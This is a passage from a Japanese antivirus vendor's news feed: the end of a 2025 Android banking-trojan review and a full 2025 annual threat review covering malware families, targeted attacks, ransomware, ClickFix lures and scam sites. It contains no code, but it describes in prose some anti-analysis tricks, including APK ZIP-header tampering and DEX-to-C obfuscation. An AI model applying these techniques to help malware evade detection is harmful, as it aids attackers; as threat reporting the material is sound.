スパイウェア機能を備えた Android.SpyMax も引き続き拡散されています。Android.SpyMax はRAT（リモートアクセス型トロイの木馬）であるSpyNoteの流出したソースコードをベースにしたトロイの木馬で、スパイウェアとしてのみでなくバンキング型トロイの木馬としても使用されています。ただし、バンキング型トロイの木馬の検出数全体に占める Android.SpyMax の割合は2024年の32.04%から12.35%へと減少しており、活動には低下がみられます。

2025年にロシアのユーザー間で最も多く拡散されたバンキング型トロイの木馬は広範なMamontファミリーに属するもので（Android.Banker.790.origin、Android.Banker.Mamont.3.origin、Android.Banker.Mamont.28.origin など）、これにはマルウェア作成者が意欲的に改変や開発を続けている多種多様な悪意のあるアプリが含まれています。これらのアプリはクレジットカード会社からのワンタイムコードを含んだSMSを傍受し、バンクカード情報などの機密情報を窃取します。

ウズベキスタンとその近隣諸国（アルメニア、アゼルバイジャン、キルギス共和国）のユーザーを標的としたバンキング型トロイの木馬の活動も観測されました。最も多く検出されたのは、銀行から送信されるSMSから認証コードを盗む Android.Banker.951.origin、Android.Banker.881.origin、Android.Banker.963.origin などのトロイの木馬です。これらトロイの木馬は、より検出されにくくなるよう常に改良され続けています。トルコのユーザーを襲ったバンキング型トロイの木馬の中で最も多く検出されたのも、同じくSMSの内容を盗むトロイの木馬 Android.BankBot.Coper.12.origin、Android.Banker.5685、Android.Banker.864.origin でした。

イランのユーザーは Android.BankBot.1190.origin や、Android.BankBot.1191.origin とその亜種による攻撃を受けました。これらバンキング型トロイの木馬は、被害者のバンクカード、口座、残高、取引などといった金融情報をSMSから盗み出し、攻撃者に送信します。また、電話帳から連絡先情報を収集し、攻撃者から受け取るコマンドに従ってSMSを送信する機能も備えています。

インドネシアや韓国を含む東南アジアおよびアジア太平洋地域の多くの国では Android.BankBot.Remo.1.origin による攻撃が観測されました。このトロイの木馬はAndroidのアクセシビリティサービス（ユーザー補助機能）を悪用して、感染させたデバイスにインストールされている銀行アプリや仮想通貨ウォレットからデータを窃取します。韓国のユーザーはこのRemoトロイの木馬に加えて Android.BankBot.15140、Android.BankBot.Ermac.6.origin、そして GoldDigger（Android.BankBot.GoldDigger.9、Android.BankBot.GoldDigger.11）による攻撃も受けました。

GoldDiggerはインドネシアとタイのユーザーに対する攻撃にも使用されています。インドネシアとマレーシアのユーザーはバンキング型トロイの木馬 Android.BankBot.Gigabud.1.origin の標的となりました。日本では引き続きトロイの木馬MoqHaoファミリーが拡散され、なかでも Android.Banker.672.origin、Android.Banker.5063、Android.Banker.740.origin といった亜種が多く検出されています。

インドのユーザーを襲ったバンキング型トロイの木馬の1つは Android.Banker.6209 でした。このトロイの木馬は正規銀行アプリの外観を模倣して、被害者の氏名、バンクカード番号、セキュリティコード（CVV）などの情報を窃取します。また、Android.Banker.814.origin や Android.Banker.913.origin、Android.Banker.5132 などのRewardStealバンキング型トロイの木馬も依然として活発です。これらはインドの大手金融機関（ICICI銀行、SBI、アクシス銀行、PM Kisanなど）と関連があるように見せかけたアプリに偽装して被害者の金融情報を盗むトロイの木馬です。

ブラジルでは、Android.BankBot.1183.origin のほか、Android.Banker.NGate.8、Android.Banker.NGate.9、Android.Banker.NGate.14 などのNGateファミリーに属するバンキング型トロイの木馬が最も多く拡散されました。

2025年にも、マルウェア作成者はAndroid向けバンキング型トロイの木馬を解析や検出から保護しようとあらゆるテクニックを駆使し続けています。とりわけ人気なのが、「DEX to C（実行可能DEXコードをC言語コードに変換する）」などの、コードを難読化したり隠したりする手法です。NP Managerユーティリティを使用して悪意のあるアプリを難読化する手法も広く用いられています。

AndroidのAPKファイルである ZIPアーカイブの形式に手を加える手口も根強い人気を誇っています。これには、APKファイルのローカルファイルヘッダ内のフィールド compression method と compressed size を改変するという方法や、ECDR（End of Central Directory Record：中央ディレクトリの終わりレコード）とCD（ファイルやアーカイブパラメータに関するデータが格納される中央ディレクトリ）内のディスクに関する情報を誤ったものにするという方法などがあります。これらの手法に関しては2024年のモバイルマルウェアレビュー内「バンキング型トロイの木馬」セクションにて詳述しています。こうした改変が加えられた後もトロイの木馬アプリは変わらず完璧に動作しますが、多くの静的解析ツールはそれらを破損したものと認識してしまうため正しく処理できなくなります。

Google Playのプロテクト機能回避などを目的に、メインのペイロードを隠蔽するためのドロッパーが使用されるケースも増えています。また、バンキング型トロイの木馬のコード記述にAIアシスタントが利用されるようになっており、このことがマルウェアの開発を簡易化し、新たなファミリーの出現に拍車をかけています。そのほか、バンキング型トロイの木馬の操作と感染させたデバイスからのデータの盗み出しにTelegramボットが使用されるケースも目立つようになっています。

今後の動向と展望

2025年には、依然として最も多く検出されるAndroid脅威である広告を表示するトロイの木馬の活動が活発化し、フィッシングや金銭窃取などの詐欺目的で使用されるさまざまな偽アプリも再び広く拡散されました。バンキング型トロイの木馬による攻撃も増加の一途をたどっています。これら悪意のあるアプリはサイバー犯罪者にとっての不正な収益源であることからその人気はいまだ衰えを知らず、2026年にも引き続き最も多く使用されるツールの1つとなる可能性が極めて高いでしょう。また、バンキング型トロイの木馬の操作にTelegramボットを使用するケースが増えてきており、この傾向は今後も続くものと考えられます。

スマートフォンやTVボックスセットのファームウェア内でトロイの木馬ファミリー Android.Vo1d と Android.Triada の新たな亜種や、Android.Clipper.31 が発見される事例もありました。このことから、攻撃者は検出を極めて複雑で困難なものにするような方法でマルウェアを拡散することに引き続き熱意を注いでいるということが見てとれます。この傾向は2026年も続き、スマートフォン、TVボックスセット、そしてその他さまざまなAndroidデバイスにマルウェアがプリインストールされる新たな事例が発生するものと予想されます。

より広範なタスクを実行できる一層高度かつ精巧なマルウェアが登場することも予測され、これには新たなバックドアやさまざまなスパイウェア型トロイの木馬が含まれるでしょう。Google Playなどの公式アプリストアは今後もマルウェアや望ましくないアプリの拡散源として悪用される可能性が高いと考えられます。

2026年にも、攻撃者は作成したツールを保護するためのあらゆる技術を引き続き積極的に組み込んでくるものと予想されます。コードの記述にAIアシスタントを活用するケースも増加するものとみられ、新たなファミリーの出現を助長する要因となるでしょう。

Doctor Webではモバイルデバイスを狙うサイバー脅威の進化と状況を監視し続け、新たな脅威の出現に迅速に対応してまいります。悪意のあるプログラムや危険なプログラムからお使いのデバイスを守るため、Dr.Web Security Space for mobile devices（モバイルデバイス向けDr.Web Security Space）をインストールすることをお勧めします。

Indicators of compromise（セキュリティ侵害インジケーター）

2025年のウイルスレビュー

Thu, 22 Jan 2026 00:00:00 GMT

2026年1月22日

2025年には、広告を表示させるトロイの木馬が最も多く検出された脅威の1つとなりました。さまざまな悪意のあるスクリプトや、感染させたシステム上で別のマルウェアを起動させるトロイの木馬プログラムも多く検出されています。メールトラフィック内では、ダウンローダ型トロイの木馬、バックドア、エクスプロイト、悪意のあるスクリプト、そしてフィッシングドキュメントが最も多く検出されました。

モバイルデバイスでは、広告を表示させるトロイの木馬とならんで、さまざまな詐欺スキームに用いられる偽アプリが最も多く検出された脅威となりました。バンキング型トロイの木馬の活動も増加しています。また、Google Playでは数十もの新たな悪意のあるアプリ、望ましくないアプリ、アドウェアアプリがDoctor Webのウイルスアナリストによって発見されました。

2025年にテクニカルサポートに寄せられたファイルの復号化リクエスト数は2024年と比較して減少しました。一方で、Telegramアカウントを盗む目的で作成された詐欺サイト数の増加がインターネットアナリストによって確認され、悪質な金融関連サイトも引き続き多く観測されています。

2025年には、複数の標的型攻撃に関してDoctor Webのアンチウイルスラボによる調査が行われました。そのうちの1つはロシアの機械工学系企業を標的とした攻撃で、脅威アクターは複数の悪意のあるツールを使用することで、感染させたコンピューターから機密情報を取得しようと試みています。Doctor Webのエキスパートにより、この攻撃の背後にいるのはハッカー集団「Scaly Wolf」であるということが特定されました。また別のインシデントはハッカー集団「Cavalry Werewolf」がロシア政府機関を攻撃したというものです。この攻撃に関する調査では脅威アクターによって使用されていた多数のツールが特定され、Cavalry Werewolfの特徴やこのハッカー集団が侵害されたネットワーク内で実行する典型的なアクションについても明らかにしています。

2025年を通して、Doctor Webではその他の情報セキュリティインシデントについても記事を公開してきました。1月には複数の異なるマルウェアを使用して仮想通貨Moneroをマイニングするアクティブなキャンペーンが発見され、4月には複数の安価なAndroidスマートフォンモデルのファームウェア内に埋め込まれた、仮想通貨を窃取するトロイの木馬について注意を喚起しました。同じく4月には、ロシア軍関係者をスパイする目的で使用されていた、人気の地図アプリの改変版に埋め込まれたAndroid向けトロイの木馬も発見されています。

7月、Doctor Webは仮想通貨とパスワードを盗むよう設計された新たなトロイの木馬ファミリーについて報告しました。これらトロイの木馬はゲームのmodやパッチ、チートに偽装して拡散されていました。8月にはロシア企業の従業員を標的に拡散されていたモバイルデバイス向けの多機能バックドアについて注意を喚起しています。サイバー犯罪者はこのマルウェアを遠隔操作し、機密情報の窃取や被害者に対するスパイ活動を行っていました。

10月には、メッセンジャーアプリTelegram Xの改変版に埋め込まれて拡散されていたAndroidデバイス向けバックドアが発見されました。このバックドアはTelegramアカウントのログインIDとパスワードをはじめとする機密情報を盗みます。このバックドアを使用することで、脅威アクターはハッキングしたアカウントを乗っ取るだけでなくメッセンジャーそのものを完全にコントロールし、ユーザーに成り代わってさまざまな操作を密かに実行することが可能です。

12月、Doctor Webはサイトのボット対策機能にブロックされないよう人間になりすましてサイトの人気度を人為的に高めるトロイの木馬について記事を公開しました。このマルウェアは脅威アクターから受け取ったパラメータに基づいて検索エンジン内で目的のサイトを自動的に検索して開き、そのWebページ上でユーザーの操作を模倣してクリックを実行します。

また2025年には、悪意のあるアクターがソーシャルエンジニアリング手法でユーザーを騙し、デバイス上で悪意のあるコードを実行させるClickFix攻撃の急増が確認されました。

2025年の主な傾向

広告を表示させるトロイの木馬の活動が活発化
新たな標的型攻撃が発生
ClickFix手法を用いた攻撃が流行
ランサムウェアによって暗号化されたファイルの復号化リクエスト数が減少
Android向けバンキング型トロイの木馬の検出数が増加
Androidデバイスのファームウェア感染の新たな事例を観測
引き続きGoogle Playからさまざまな悪意のあるアプリや望ましくないアプリが拡散される

2025年の最も注目すべきイベント

2025年1月、Doctor Webのスペシャリストは悪意のあるマイナーSilentCryptoMinerを使用して仮想通貨Moneroをマイニングするキャンペーンを発見しました。SilentCryptoMinerのファイルはビデオ通話アプリなどのさまざまなソフトウェアに偽装して拡散され、コンピューターを感染させるとそこにインストールされている他のマイナーを削除します。このキャンペーンが進行するうちに、攻撃者は一部の悪意のあるコンポーネントの拡散に、ある情報を別の情報（画像など）の中に埋め込んで隠す手法であるステガノグラフィを用いるようになりました。特殊な方法で作成された画像がダウンロードされた後、そこからSilentCryptoMinerコンポーネントが抽出されて起動されます。

4月、Doctor Webは複数の安価なAndroidスマートフォンモデルのファームウェア内で発見されたトロイの木馬 Android.Clipper.31 について記事を公開しました。脅威アクターはまずこのトロイの木馬をメッセージングアプリWhatsAppの改変版に組み込み、次にAndroidスマートフォンメーカーのサプライチェーンを侵害することで、そのトロイの木馬化されたWhatsAppをスマートフォンにプリインストールしています。 Android.Clipper.31 はWhatsApp内で送受信されるメッセージを傍受し、仮想通貨TronおよびEthereumのウォレットアドレス形式に一致する文字列を検出してそれらを攻撃者のアドレスに置き換えます。同時に、置き換えに気づかれることのないようユーザーに対しては正しいウォレットアドレスを表示させます。

4月下旬、Doctor Webのエキスパートは地図アプリ「AlpineQuest」の一部のバージョンに埋め込まれてロシア軍関係者をスパイする目的で使用されていたトロイの木馬 Android.Spy.1292.origin を発見しました。このトロイの木馬は感染したデバイスから機密情報を収集するほか、攻撃者がファイルを盗むことも可能にします。

7月、Doctor Webは仮想通貨やパスワードを盗むよう設計されたトロイの木馬 Trojan.Scavenger について記事を公開しました。このトロイの木馬はゲームのmodやチート、パッチなどに偽装して拡散され、DLL検索順序ハイジャッキング脆弱性を悪用するなどの方法で正規ソフトウェアを利用して起動されます。

8月、Doctor Webはロシア企業の従業員を標的とした多機能バックドア Android.Backdoor.916.origin の拡散について記事を公開しました。このマルウェアはアンチウイルスに偽装してメッセンジャーのダイレクトメッセージ（DM）から拡散され、標的デバイスを感染させた後は機密情報を収集するほか、攻撃者が被害者をスパイすることを可能にします。

8月には、ロシアの機械工学系企業を狙ったScaly Wolfグループによる標的型攻撃に関する調査レポートも公開しています。この攻撃では複数の悪意のあるツールが用いられており、そのうちメインとなるものの1つがモジュール型バックドアUpdatarでした。Updatarは攻撃者が感染させたコンピューターから機密データを収集することを可能にします。

10月、Doctor WebのエキスパートはメッセンジャーアプリTelegram Xの改変版に埋め込まれたバックドア Android.Backdoor.Baohuo.1.origin を発見しました。Android.Backdoor.Baohuo.1.origin はTelegramアカウントからログインIDとパスワードをはじめとする機密データを窃取します。また、脅威アクターがユーザーのアカウントとメッセンジャー自体の両方を完全にコントロールし、ユーザーに成り代わってさまざまな操作を密かに実行することを可能にします。たとえば、ユーザーをTelegramチャンネルに参加・退出させたり、特定のチャットや新規認証済みデバイスを非表示にしたりすることができます。

11月、Doctor Webはハッカー集団「Cavalry Werewolf」によるロシア政府機関を狙った標的型攻撃について調査レポートを公開しました。この調査において、Doctor WebのエキスパートはCavalry Werewolfが攻撃キャンペーンで使用していた多数の悪意のあるツールを特定することに成功しています。それらのツールにはオープンソースツールも含まれていました。Cavalry Werewolfの特徴についても調査が行われ、リバースシェルバックドアを好んで使用していること、感染させたコンピューターの操作にTelegram APIを頻繁に使用していることが明らかになりました。また、この攻撃は政府機関を騙って送信されるフィッシングメールから始まっており、これらのメールにさまざまな公文書を装ったマルウェアが添付されていました。

12月、Doctor Webは人間になりすましてサイトの人気度を人為的に高めるマルウェアTrojan.ChimeraWire に関する調査結果を公開しました。このトロイの木馬は悪意のあるアクターから受け取ったパラメータに従って、検索エンジンGoogleとBing内で目的のサイトを探してそれらを開き、そのサイト上でユーザーの操作を模倣してクリックを実行します。Trojan.ChimeraWire はDLL検索順序ハイジャッキング脆弱性を悪用する複数の悪意のあるダウンローダによってコンピューターにインストールされます。

2025年にはClickFix手法を用いた攻撃が急増しました。この攻撃はソーシャルエンジニアリングの一種で、攻撃者がユーザーを巧妙に操りデバイス上で悪意のあるコードを実行させるというものです。ユーザーが侵害されたサイトや偽サイトにアクセスすると、ブラウザのエラーによりWebページを正しく表示できない、あるいは更新が必要であるなどと通知する警告メッセージが表示され、問題を「修正（fix）」するよう誘導されます。攻撃の種類によって、ユーザーはWebページ上に表示されている文字列をコピーするか、またはただ単に該当するボタン（「更新」、「修正」など）をクリックするよう指示されます。後者の場合、攻撃者が必要とする内容（悪意のあるコードなど）は自動的にクリップボードにコピーされます。続けて、ユーザーはコマンドラインまたはPowerShellターミナルを起動し、そこにクリップボードの内容を貼り付けてキーボードの「Enter」キーを押すよう促されます。こうして、被害者は自らの手で悪意のあるコードを実行する格好となり、ここから感染チェーンが開始されます。ClickFix攻撃の詳細についてはこちらの記事をご覧ください。

マルウェアに関する状況

Dr.Webアンチウイルス製品の検出統計によると、2025年に検出された脅威の合計数は2024年と比較して5.45%増加し、一方でユニークな脅威の数は15.89%減少しています。最も多く検出された脅威はさまざまな悪意のあるスクリプトとアドウェア型トロイの木馬となり、別の悪意のあるアプリを起動させるトロイの木馬も多く検出されました。また、AutoItスクリプト言語で書かれたトロイの木馬による攻撃も引き続き確認されています。このトロイの木馬は別のマルウェアと一緒に拡散されて、それらの検出を困難にするよう設計されています。

VBS.KeySender.6
VBS.KeySender.7: mode extensions、разработчика、розробника というテキストを含むウィンドウを無限ループで検索し、Escapeキー押下イベントを送信してそれらを強制的に閉じる悪意のあるスクリプトです。
Trojan.BPlug.4242: WinSafeブラウザ拡張機能の悪意のあるコンポーネントの検出名です。このコンポーネントはブラウザに迷惑な広告を表示させるJavaScriptファイルです。
Trojan.Starter.8319
Trojan.Starter.8326
Trojan.Starter.8332: マルウェア Trojan.AutoIt.289 とそのコンポーネントを起動する悪意のあるXMLスクリプトの検出名です。
JS.Siggen5.44590: パブリックJavaScriptライブラリes5-ext-mainに追加される悪意のあるコードです。タイムゾーン設定がロシア国内のものになっているサーバーにパッケージがインストールされた場合に、特定のメッセージを表示します。
Trojan.Siggen30.53926: 脅威アクターによって改変されたElectronフレームワークのホストプロセスの検出名です。Steamアプリケーションのコンポーネント（Steam Client WebHelper）に偽装し、JavaScriptバックドアをロードします。
JS.MalVpn.1: さまざまな悪意のあるプログラムによってC2サーバーへの接続に使用される悪意のあるスクリプトです。
Trojan.Siggen31.34463: 感染したシステムにさまざまなマイニング型トロイの木馬やアドウェアをダウンロードするよう設計された、Go言語で記述されたトロイの木馬です。このマルウェアは %appdata%\utorrent\lib.dll に置かれるDLLファイルで、Torrentクライアント「uTorrent」のDLL検索順序ハイジャッキング（DLL Search Order Hijacking）脆弱性を悪用することで起動します。

2025年にメールトラフィック内で最も多く検出された脅威は、別のマルウェアをダウンロードしてインストールするトロイの木馬となっています。また、さまざまなバックドア、エクスプロイト、フィッシングドキュメント、そして悪意のあるスクリプトも拡散されました。

W97M.DownLoader.2938: Microsoft Officeドキュメントの脆弱性を悪用するダウンローダ型トロイの木馬のファミリーです。感染させたコンピューターに別の悪意のあるプログラムをダウンロードすることもできます。
Exploit.CVE-2017-11882.123
Exploit.CVE-2018-0798.4: Microsoft Officeソフトウェアの脆弱性を悪用し、攻撃者が任意のコードを実行できるようにするエクスプロイトです。
JS.Phishing.684
JS.Phishing.745: フィッシングページを生成する悪意のあるJavaScriptスクリプトです。
BackDoor.AgentTeslaNET.20: 機密情報を窃取するよう設計されたスパイウェアです。ブラウザやメッセンジャー、メールクライアント、データベースなどといった多くのプログラムからログインIDとパスワードを収集して攻撃者に送信します。また、クリップボードの内容を盗み、キーロガー機能を備え、スクリーンショットを撮ることも可能です。
Win32.Expiro.153: Windows実行ファイルを感染させるファイルウイルスです。さまざまなプログラムのパスワードを窃取することを主な目的としています。
JS.DownLoader.1225: 疑わしい名前のJavaScriptを含むZIPアーカイブのヒューリスティック検出名です。
Trojan.PackedNET.3223: パッカーで保護されたマルウェアの検出名です。
Trojan.AutoIt.1413: AutoItスクリプト言語で記述された悪意のあるアプリ Trojan.AutoIt.289 の、パックされたバージョンの検出名です。マイニング型トロイの木馬やバックドア、自己増殖型モジュールなど複数の悪意のあるアプリグループの一部として拡散されます。Trojan.AutoIt.289 はメインのペイロードの検出を困難にする、さまざまな悪意のある動作を実行します。

暗号化ランサムウェア

2025年には、ランサムウェア型トロイの木馬に感染したユーザーからDoctor Webのテクニカルサポートに寄せられるファイルの復号化リクエスト数に2024年と比較して35.98%の減少がみられました。以下のグラフは2025年におけるリクエスト数の推移を表しています。

2025年に最も多く検出されたランサムウェア：

Trojan.Encoder.35534 （リクエストの23.22% ）: Mimicとしても知られるランサムウェアです。Windowsコンピューター上のファイルを高速で検索できる正規ソフトウェア「Everything」の everything.dll ライブラリを使用します。
Trojan.Encoder.35209 （リクエストの3.33% ）: ランサムウェアContiのソースコードを基にしたランサムウェア型トロイの木馬です。ChaCha20アルゴリズムを使用してファイルを暗号化します。脅威アクターのC2サーバー数台を停止させることに成功し、RSA暗号の秘密鍵が公開されたことで、現在ではこのトロイの木馬の一部の亜種によって暗号化されたファイルを復号化することが可能です。
Trojan.Encoder.35067 （リクエストの2.50% ）: Macopとしても知られるランサムウェア型トロイの木馬です（Trojan.Encoder.30572 はこのトロイの木馬のまた別の亜種の１つです）。サイズは30～40KB程度と小さく、トロイの木馬にサードパーティの暗号化ライブラリが組み込まれておらず、暗号化とキーの生成にCryptoAPIのみを使用するということがその一因となっています。ファイルの暗号化にはAES-256アルゴリズムを使用し、キー自体はRSA-1024を使用して暗号化されます。
Trojan.Encoder.41868 （リクエストの2.31%）: そのアーティファクトから、ハッカー集団「C77L」が作成に関わっていることが示されているランサムウェアです。
Trojan.Encoder.29750 （リクエストの2.13% ）: 複数のバージョンを持つランサムウェア型トロイの木馬です。現在の亜種はAES-256+RSAアルゴリズムを使用してファイルを暗号化します。

インターネット詐欺

2025年には、メッセンジャーアプリTelegramのユーザーアカウントを盗むフィッシングサイトの増加がDoctor Webのインターネットアナリストによって確認されました。悪意のあるアクターは偽の認証画面や、利用規約違反について通知してアカウントの確認を行うよう求めるTelegramサポートを装った偽のメッセージなどといったさまざまな手口を用いています。

利用規約違反について通知してTelegramアカウントの確認を行うよう求めるフィッシングサイトの例

ゲームプラットフォームやオンラインストアなど他のサービスのユーザーを標的にした同様のサイトも発見されています。これらの偽サイトは正規サイトとそっくりな外観で、アカウントにログインするようユーザーを誘導します。罠にかかったユーザーは機密情報を攻撃者に渡してしまうことになります。

アカウント名とパスワードを入力するためのフィッシングフォームを表示させる、ゲームプラットフォーム「Steam」の偽サイト

あらゆる種類のギフトやボーナス、あるいは「お得なプロモーション」を提供する詐欺サイトも引き続きさまざまなものが出現しています。ロシアで多く見られたのは、賞品の抽選に参加できるとうたってユーザーを誘う偽のマーケットプレイスサイトでした。これらのサイトでは必ずユーザーが「当選」するようプログラムされており、当選後は賞品を受け取るためにまず税金を、そして次は送料、その次は保険料、などといった具合に次から次へと支払いを要求してきます。賞品の在庫がないため代わりに現金で受け取ることができるとユーザーに提案するバージョンも確認されていますが、この場合も同様に手数料や保険料などと称して支払いを要求されます。最終的に被害者が賞品を受け取ることはありません。

「賞品の抽選」に参加できると誘う偽のマーケットプレイスサイトの例

同様の手口の1つに、英国のユーザーを標的とした公共交通機関の偽サイトがあります。交通系ICカードの「限定版」が当たるゲームに参加するようユーザーを誘うというもので、記念バージョンであるこれらの限定版ICカードを使用すれば対象となる公共交通機関を無料で利用できるとうたっています。ユーザーは必ず「当たり」を引くようになっていますが、獲得したカードを「受け取る」ために個人情報を提供して少額の手数料を支払うよう求められます。

公共交通機関を装い、交通系ICカードが当たる抽選に参加するよう誘う詐欺サイト

金融関連の詐欺サイトも依然としてあらゆるものが横行しています。なかでも詐欺師の間で揺るがぬ人気を誇っているのが、独自のアルゴリズムや人工知能（AI）に基づく自動システムを活用した市場取引で利益を得ることができると主張する詐欺サイトです。あらゆる国のユーザーを標的としたものが観測されており、その多くは「リクエスト」申請や「アカウント」登録のためと称して個人情報を要求します。提供された情報は攻撃者の手に渡り、後に転売されたり、ユーザーをさらなる偽の投資サービスに誘い込み「取引」アカウントに入金するよう誘導したりする目的で使用される可能性があります。

Apple 社と関連があるとうたい、AIを活用した「投資プラットフォーム」へのアクセスを提供する詐欺サイトの例

こうしたサイトのなかには、特定の企業の「バーチャルアシスタント」や「社員」を装った詐欺師との偽のチャットという似たようなテンプレートを使用するものが多くみられます。ユーザーはチャット内でいくつかの質問に回答して個人情報を提供するよう求められます。

フランスのユーザーを標的としたサイトの1つ：架空の自動取引ソフトウェア「TraderAI」へのアクセスを提供し、このソフトウェアを使用することで3,500ユーロから始めて高額の収入を得ることができるとうたっている

メッセージングアプリTelegram 内で取引を行うことができる投資サービスを宣伝するサイトも確認されています。このサイトでは、グローバル企業の株を「スマートフォンのブラウザ内で直接」自動売買して月に1万ユーロを稼ぐことができると約束しています。

株を自動売買するという「Telegramプラットフォーム」に参加するよう誘う詐欺サイト

Telegram、WhatsApp、TikTokなどの大手企業やサービスが開発に関わっているとする「取引ボット」を使用してお金を稼ぐことができると主張する詐欺サイトもありました。

WhatsAppと関連があるとする架空の取引ボットを活用するようユーザーを誘うサイトの例

2025年を通して、ロシアやCIS（独立国家共同体）、欧州諸国を含む多くの国のユーザーを標的に石油・ガス部門への投資を勧める新たな詐欺サイトが発見されています。これらのサイトでも、多くの場合ユーザーは氏名や携帯電話番号、メールアドレスなどといった個人情報を提供するよう要求されます。

キルギスのユーザーを標的に「石油・ガス取引で儲け」て大きな利益を得ることができると約束する詐欺サイト

給付金や補助金などの「政府支援」を約束する詐欺サイトも依然として後を絶ちません。ロシアのユーザーを標的としたものでは、ロシア政府ポータルサイト（Gosuslugi）と関連があるとうたう詐欺サイトが主流となっています。

ロシア政府ポータルサイト（Gosuslugi）と関連があるとうたい、政府と大手石油・ガス会社からの安定した支払いを約束する詐欺サイトの例：この給付金プログラムに「参加」するためにユーザーは個人情報を提供するよう求められる

教育関連を装った詐欺サイトにも新たなものが出現しています。金融リテラシーを向上させたり、特定の職業のスキルを習得したりするためのさまざまな教育・トレーニングコースを提供するサイトが観測されました。他の手口と同様、これらのサイトでもユーザーはトレーニングに「アクセス」するために個人情報を提供するよう要求されます。

英語学習を提供する詐欺サイト

2025年には、劇場チケットを販売するという新たな詐欺サイトが登場しました。こうしたサイトではチケットを割引価格で提供していますが、購入代金を支払ったユーザーがチケットを受け取ることはありません。

存在しない劇場チケットを販売する詐欺サイトの1つ

そのほか、映画チケットを販売するプライベートシアターの偽サイトも多くみられるようになりました。これらのサイトでも支払った購入代金は詐欺師の手に渡り、被害者がチケットを受け取ることはありません。

プライベートシアターの偽サイト

モバイルデバイス

Dr.Web Security Space for mobile devices（モバイルデバイス向けDr.Web Security Space）によって収集された検出統計によると、2025年には広告を表示させるトロイの木馬 Android.MobiDash と Android.HiddenAds、そしてうたわれた機能を実行する代わりにさまざまなWebサイト（詐欺サイトや悪意のあるサイトを含む）を開く偽アプリ Android.FakeApp が最も多く検出されたAndroidマルウェアとなりました。サイバー犯罪者によってAndroidデバイスのファームウェアに埋め込まれる多機能トロイの木馬 Android.Triada の活動も増加しています。バンキング型トロイの木馬については、Android.Banker Android.Bankerによる攻撃が増加する一方で、Android.SpyMax の活動は減少しています。

2025年にも、マルウェア作成者は悪意のあるAndroidアプリを解析や検出から保護しようとあらゆるテクニックを駆使し続けています。そのうちの1つにDEXコードをCコードに変換するという手法がありました（DCCとも呼ばれます）。

最も多く検出された望ましくないアプリケーションは Program.FakeMoney となりました。これらはさまざまなタスクを完了することで仮想報酬を得ることができるとうたうアプリで、この報酬は現金化できるとされていますが実際にユーザーがお金を受け取ることはありません。また、Program.FakeAntiVirus.1 と Program.CloudInject.1 も多く検出されています。Program.FakeAntiVirus.1 はアンチウイルスの動作を模倣して存在しない脅威の検出を通知し、検出された問題を「修復」するために製品の完全版を購入するよう促すアプリです。Program.CloudInject.1 はクラウドサービスCloudInjectを使用して改造されたアプリで、その改造過程で危険なシステム権限や難読化されたコードが追加されます。その目的を改造者はコントロールすることができません。

最も多く検出されたリスクウェアはNP Managerユーティリティを使用して改造されたアプリとなりました（Tool.NPModとして検出）。NP Managerはアプリのコードを難読化し、改造後にデジタル署名の検証をすり抜けることを可能にします。最も多く検出されたアドウェアは、ユーザーの使用中に自動で広告リンクを開くWhatsApp MessengerのMod（改造版）Adware.ModAd.1 でした。

2025年には、Androidデバイスのファームウェア感染について新たな事例が確認されました。Doctor Webではそのうちの1例について4月に記事を公開しています。複数の安価なスマートフォンモデルのシステム領域内に、ユーザーから仮想通貨を盗むトロイの木馬 Android.Clipper.31 がプリインストールされていたというものです。また別のAndroidスマートフォンモデルのファームウェア内に危険なトロイの木馬 Android.Triada が埋め込まれているという事例もありました。そのほか、2024年にDoctor Webによって発見されたトロイの木馬 Android.Vo1d の新たな亜種によるAndroid TVボックスセットのファームウェア感染にも新たな事例が観測されています。

2025年を通して、Doctor Webのアンチウイルスラボではいくつもの危険なマルウェアを特定してきました。4月には、脅威アクターによって改変された地図アプリ「AlpineQuest」内に潜むトロイの木馬 Android.Spy.1292.origin について記事を公開しています。Android.Spy.1292.origin はロシアの軍関係者を標的としており、携帯電話番号とアカウント、電話帳の連絡先、デバイスの位置情報、デバイスのメモリ内に保存されているファイルに関する情報といった機密データをサイバー犯罪者に送信していました。また、攻撃者からコマンドを受け取った場合は特定のファイルを盗むこともできます。主に狙われていたのはユーザーがTelegramやWhatsApp経由で送信する機密文書、そしてAlpineQuestによって作成される位置情報ログファイルでした。

8月には、人気のメッセージングアプリのダイレクトメッセージ（DM）からアンチウイルスを装って拡散されていたバックドア Android.Backdoor.916.origin について記事を公開しました。Android.Backdoor.916.origin は機密情報を窃取し、攻撃者がユーザーをスパイすることを可能にします。その主たる標的はロシア企業の従業員でした。

10月には、メッセンジャーアプリTelegram Xの改変版に潜む多機能バックドア Android.Backdoor.Baohuo.1.origin が発見されました。このマルウェアは被害者のTelegramアカウントからログインIDとパスワード、着信SMS、チャット、クリップボードの内容などといった機密データを窃取します。さらに、Android.Backdoor.Baohuo.1.origin を使用することで攻撃者はハッキングしたアカウントとメッセンジャー自体の両方を完全に乗っ取ることが可能です。このバックドアの操作には従来の方法であるC2サーバー経由に加え、これまでAndroidマルウェアでは例を見ないRedisデータベース経由でのコマンド送信が使用されています。Android.Backdoor.Baohuo.1.origin の標的とされていたのは主にブラジルとインドネシアのユーザーでした。

2025年のモバイルデバイスを取り巻くセキュリティ脅威の状況についての詳細はこちらのレビューをご覧ください。

今後の動向と展望

2026年にも、サイバー犯罪者の違法な収益源であるアドウェア型トロイの木馬が最も多く検出される脅威の1つとして君臨し続けるでしょう。同じくサイバー犯罪者に利益をもたらすバンキング型トロイの木馬もますます多く使用されるようになると予想されます。

2026年には、パッカーや難読化ツール、悪意のあるドロッパーや多段階ダウンローダ、ペイロードを隠すためのステガノグラフィの使用をはじめとした、悪意のあるアクティビティを隠蔽するためのさまざまなツールや手法が一層広く用いられるようになる可能性があります。また、マルウェアの作成にAIアシスタントがますます多く活用されるようになるとみられます。これによりプログラミング経験の浅いサイバー犯罪者でもマルウェア生成が可能となり、新たなマルウェアファミリーの出現と脅威数の増加を引き起こすことになるでしょう。

政府機関や企業は引き続きサイバー犯罪者のターゲットとなり、標的型攻撃が増加するでしょう。AndroidスマートフォンやTVボックスセット、そしてその他モバイルデバイスのファームウェアが感染する新たな事例も発生する可能性が高いと考えられます。特に低価格帯のデバイスで気を付ける必要があります。インターネット詐欺は今後も横行するでしょう。

Dr.Web FixIt! ライセンス使用許諾の更新

Mon, 29 Dec 2025 15:42:04 GMT

Dr.Web FixIt! のライセンス使用許諾契約が更新されました。
更新後の契約内容は、以下のリンクよりご確認いただけます。https://license.drweb.com/agreement 。

